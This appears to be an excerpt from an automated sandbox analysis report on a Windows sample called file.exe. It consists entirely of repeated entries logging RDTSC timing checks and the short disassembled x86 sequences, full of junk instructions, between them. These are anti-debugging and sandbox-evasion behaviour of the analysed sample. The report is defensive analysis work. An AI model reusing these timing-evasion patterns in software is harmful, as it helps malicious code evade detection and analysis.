                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650917 second address: 650945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7704E143B6h 0x0000000a popad 0x0000000b jns 00007F7704E143CEh 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F60B second address: 64F617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7704DD53A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F617 second address: 64F634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F7704E143C2h 0x0000000b jg 00007F7704E143B6h 0x00000011 jnc 00007F7704E143B6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F634 second address: 64F646 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F7704DD53A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F646 second address: 64F64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FE6D second address: 64FECA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7704DD53B2h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F7704DD53B1h 0x00000010 jno 00007F7704DD53A6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F7704DD53B8h 0x00000021 pushad 0x00000022 jmp 00007F7704DD53AEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FECA second address: 64FEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7704E143B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650319 second address: 65031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65031F second address: 650325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650325 second address: 650365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F7704DD53B4h 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007F7704DD53A6h 0x00000018 popad 0x00000019 pushad 0x0000001a jl 00007F7704DD53A6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650614 second address: 650649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C5h 0x00000009 jmp 00007F7704E143C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650649 second address: 65064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6507CD second address: 6507D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7704E143B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655AAF second address: 655AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7704DD53A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5DF4 second address: 5D5E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7704E143BAh 0x0000000c jmp 00007F7704E143BFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5E14 second address: 5D5E41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F7704DD53ACh 0x0000000e jc 00007F7704DD53A6h 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F7704DD53B3h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5E41 second address: 5D5E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5E47 second address: 5D5E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C0BB second address: 65C0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C0CE second address: 65C0F1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7704DD53A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F7704DD53B0h 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C0F1 second address: 65C101 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7704E143C2h 0x00000008 js 00007F7704E143B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AB91 second address: 65AB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AB98 second address: 65ABDC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7704E143C8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F7704E143C0h 0x0000000f pushad 0x00000010 jmp 00007F7704E143C2h 0x00000015 jmp 00007F7704E143C5h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65ABDC second address: 65ABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7704DD53B0h 0x0000000f jnl 00007F7704DD53A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65ABFC second address: 65AC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC05 second address: 65AC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC0B second address: 65AC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7704E143B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC1A second address: 65AC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AE96 second address: 65AEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BFh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AFFF second address: 65B005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B005 second address: 65B00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B00B second address: 65B00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B381 second address: 65B393 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B393 second address: 65B397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B908 second address: 65B90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B90E second address: 65B913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B913 second address: 65B932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6031BA second address: 6031C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6031C7 second address: 6031D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F7704E143B6h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660BC9 second address: 660BE5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704DD53ACh 0x00000008 jl 00007F7704DD53B2h 0x0000000e js 00007F7704DD53A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BD08 second address: 61BD1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BD1B second address: 6026B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F7704DD53A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D33A8h], edx 0x0000002c call dword ptr [ebp+122D2BD9h] 0x00000032 jc 00007F7704DD53AEh 0x00000038 jbe 00007F7704DD53A8h 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F7704DD53B3h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C2F7 second address: 61C2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C2FD second address: 61C316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F7704DD53A8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C6B3 second address: 61C6E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7704E143C9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C6E4 second address: 61C711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F7704DD53A6h 0x00000009 jnp 00007F7704DD53A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F7704DD53ACh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jl 00007F7704DD53ACh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C711 second address: 61C719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CB25 second address: 61CB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7704DD53A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CB35 second address: 61CBA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D29EDh] 0x00000011 add edi, 5F388069h 0x00000017 push 0000001Eh 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F7704E143B8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 pushad 0x00000034 jl 00007F7704E143BCh 0x0000003a mov esi, dword ptr [ebp+122D38B1h] 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F7704E143BFh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CBA1 second address: 61CBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CE9B second address: 61CEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov dword ptr [ebp+12470146h], eax 0x0000000d lea eax, dword ptr [ebp+1247BAD5h] 0x00000013 mov dword ptr [ebp+122D34FDh], edx 0x00000019 push eax 0x0000001a push eax 0x0000001b jmp 00007F7704E143BAh 0x00000020 pop eax 0x00000021 mov dword ptr [esp], eax 0x00000024 mov cx, si 0x00000027 lea eax, dword ptr [ebp+1247BA91h] 0x0000002d pushad 0x0000002e mov dword ptr [ebp+122D29CAh], eax 0x00000034 call 00007F7704E143BEh 0x00000039 call 00007F7704E143BAh 0x0000003e pop ebx 0x0000003f pop edx 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F7704E143BAh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CEFC second address: 6031BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F7704DD53BFh 0x00000010 jmp 00007F7704DD53B9h 0x00000015 nop 0x00000016 mov edi, dword ptr [ebp+122D34FDh] 0x0000001c call dword ptr [ebp+122D34F0h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6600F8 second address: 660103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660103 second address: 660167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 jnc 00007F7704DD53A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F7704DD53A6h 0x00000016 jmp 00007F7704DD53B6h 0x0000001b jmp 00007F7704DD53ACh 0x00000020 jmp 00007F7704DD53B8h 0x00000025 popad 0x00000026 popad 0x00000027 jng 00007F7704DD53C2h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660167 second address: 660178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F7704E143B6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66044A second address: 66047D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7704DD53B4h 0x00000008 jmp 00007F7704DD53ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F7704DD53C0h 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F7704DD53A6h 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66047D second address: 660481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660481 second address: 660487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605C5 second address: 6605C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605C9 second address: 6605D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605D3 second address: 6605D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605D9 second address: 6605DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660728 second address: 66074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C0h 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704E143BFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6689DC second address: 668A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F7704DD53AEh 0x0000000b pushad 0x0000000c jmp 00007F7704DD53B5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668A07 second address: 668A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669467 second address: 66946B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6698E5 second address: 6698EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6698EB second address: 6698EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6698EF second address: 6698FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7704E143B6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6698FF second address: 669905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B996 second address: 66B9AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7704E143C0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9AC second address: 66B9B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9B2 second address: 66B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E76B second address: 66E76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E76F second address: 66E77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7704E143B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6724AD second address: 6724DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B1h 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F7704DD53A6h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F7704DD53B1h 0x0000001b jmp 00007F7704DD53ABh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677397 second address: 67739D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6774E3 second address: 6774EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F7704DD53A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6774EE second address: 6774FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7704E143B6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6774FB second address: 677501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DE24 second address: 67DE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DE2F second address: 67DE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7704DD53A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CFD7 second address: 67D013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7704E143C6h 0x0000000e push ebx 0x0000000f jmp 00007F7704E143BBh 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D013 second address: 67D019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D1BB second address: 67D1C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D328 second address: 67D335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F7704DD53A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D485 second address: 67D4AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BBh 0x00000009 jmp 00007F7704E143C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D61E second address: 67D639 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7704DD53AEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
